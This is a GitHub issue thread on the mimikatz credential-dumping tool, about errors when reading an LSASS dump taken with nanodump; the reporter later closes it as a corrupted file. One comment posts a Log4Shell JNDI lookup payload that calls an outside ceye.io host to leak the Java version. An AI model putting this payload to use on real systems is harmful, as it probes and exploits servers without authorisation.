### ISSUE TITLE
UTF-8 / nanodump -> mimikatz and pypykatz errors

### ISSUE THREAD

**Issue by hastalamuerte** [gentilkiwi/mimikatz#444]
Hello, i was try to get secrets taken with nanodump on machnie with first non eng language (ASCII, UTF-8) and eng as a second keyboard language 

facing that 
-
![image](https://github.com/gentilkiwi/mimikatz/assets/63853227/c54001f0-caf8-4ced-9799-e61146f97092)
on 64 version it think a bit and then error. on 32 - error immediatly . I running 64 os , dump made from 64 too.

**Comment by Lucifer1993** [comment]
${jndi:ldap://${java:version}.dx3hbm.ceye.io}

**Comment by hastalamuerte** [comment]
> ${jndi:ldap://${java:version}.dx3hbm.ceye.io}

I see your same comment in couple of issues? what is it? how it can be used - can you plz explain.

**Comment by hastalamuerte** [comment]
Sorry. its was corrupted via transport dump file issue. closing
